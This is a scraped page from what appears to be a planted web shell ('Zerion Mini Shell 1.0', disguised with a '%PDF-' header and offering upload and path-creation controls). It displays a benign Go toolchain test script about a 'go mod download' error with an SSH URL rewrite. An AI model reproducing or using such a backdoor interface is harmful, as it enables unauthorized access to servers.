%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/local/go119/src/cmd/go/testdata/script/
Upload File :
Create Path :
Current File : //usr/local/go119/src/cmd/go/testdata/script/mod_download_issue51114.txt

[short] skip
[!exec:git] skip
[!net] skip
[!linux] skip  # Uses XDG_CONFIG_HOME

env GIT_CONFIG_GLOBAL=$WORK/.gitconfig
env GOPROXY=direct

! go mod download
stderr '^go: github\.com/golang/notexist/subdir@v0.1.0: reading github\.com/golang/notexist/subdir/go\.mod at revision subdir/v0\.1\.0: '

-- go.mod --
module test

go 1.18

require github.com/golang/notexist/subdir v0.1.0

-- $WORK/.gitconfig --
[url "git@github.com:"]
	insteadOf = https://github.com/

Zerion Mini Shell 1.0